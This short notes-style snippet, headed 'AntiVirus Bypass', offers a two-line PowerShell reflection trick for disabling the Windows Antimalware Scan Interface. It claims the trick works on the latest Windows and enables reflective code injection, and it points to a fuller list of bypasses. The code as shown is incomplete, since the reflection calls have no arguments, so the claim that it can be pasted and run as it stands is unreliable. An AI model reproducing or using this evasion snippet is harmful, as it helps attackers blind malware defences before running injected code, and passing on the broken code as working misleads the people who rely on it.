Link to this headingAntiVirus Bypass
Quick powershell amsi bypass:
$foo= [Ref].Assembly.GetType.GetField
$foo.SetValue
This will work on the latest versions of windows and allow reflective code injection, etc. I will keep this updated if this specific string gets detected. otherwise it should be a straight copy and paste.
There is also a comprehensive list here:
Antimalware Scan Interface (AMSI) bypass